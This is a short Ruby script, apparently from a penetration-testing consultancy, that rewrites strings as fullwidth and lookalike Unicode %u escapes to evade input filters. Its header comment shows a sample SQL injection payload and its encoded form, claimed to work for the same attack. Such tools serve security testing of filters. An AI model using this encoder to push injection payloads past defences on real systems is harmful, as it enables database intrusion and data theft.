# Ruby Script to generate URL encoded Unicode UTF-8 URL. # Author: Gary O'leary-Steele of Sec-1 Ltd # Example: # The string ' or 1 in (@@version)-- is encoded as and work for the same SQL injection attack # %u02b9%u0020%uff4f%uff52%u0020%uff11%u0020%uff49%uff4e%u0020%uff08%u0040%u0040%uff56%uff45%uff52%uff53%uff49%uff4f%uff4e%uff09%uff0d%uff0d # # require 'uri' def unicode_url(string) lookuptable = Hash.new lookuptable ={ ' ' => '%u0020', '/' => '%u2215', '\\' => '%u2215', "'" => '%u02b9', '"' => '%u0022', '>' => '%u003e', '<' => '%u003c', '#' => '%uff03', '!' => '%uff01', '$' => '%uff04', '*' => '%uff0a', '@' => '%u0040', '.' => '%uff0e', '_' => '%uff3f', '(' => '%uff08', ')' => '%uff09', ',' => '%uff0c', '%' => '%u0025', '-' => '%uff0d', ';' => '%uff1b', ':' => '%uff1a', '|' => '%uff5c', '&' => '%uff06', '+' => '%uff0b', '=' => '%uff1d', 'a' => '%uff41', 'A' => '%uff21', 'b' => '%uff42', 'B' => '%uff22', 'c' => '%uff43', 'C' => '%uff23', 'd' => '%uff44', 'D' => '%uff24', 'e' => '%uff45', 'E' => '%uff25', 'f' => '%uff46', 'F' => '%uff26', 'g' => '%uff47', 'G' => '%uff27', 'h' => '%uff48', 'H' => '%uff28', 'i' => '%uff49', 'I' => '%uff29', 'j' => '%uff4a', 'J' => '%uff2a', 'k' => '%uff4b', 'K' => '%uff2b', 'l' => '%uff4c', 'L' => '%uff2c', 'm' => '%uff4d', 'M' => '%uff2d', 'n' => '%uff4e', 'N' => '%uff2e', 'o' => '%uff4f', 'O' => '%uff2f', 'p' => '%uff50', 'P' => '%uff30', 'q' => '%uff51', 'Q' => '%uff31', 'r' => '%uff52', 'R' => '%uff32', 's' => '%uff53', 'S' => '%uff33', 't' => '%uff54', 'T' => '%uff34', 'u' => '%uff55', 'U' => '%uff35', 'v' => '%uff56', 'V' => '%uff36', 'w' => '%uff57', 'W' => '%uff37', 'x' => '%uff58', 'X' => '%uff38', 'y' => '%uff59', 'Y' => '%uff39', 'z' => '%uff5a', 'Z' => '%uff3a', '0' => '%uff10', '1' => '%uff11', '2' => '%uff12', '3' => '%uff13', '4' => '%uff14', '5' => '%uff15', '6' => '%uff16', '7' => '%uff17', '8' => '%uff18', '9' => '%uff19'} # Convert string to array of chars chararray = string.scan(/./) newstr = String.new chararray.each do |c| if lookuptable.has_key? c newstr = newstr + lookuptable[c] else newstr = newstr + URI.escape(c) end end return newstr end print "Enter string to URL Unicode:" puts unicode_url(gets)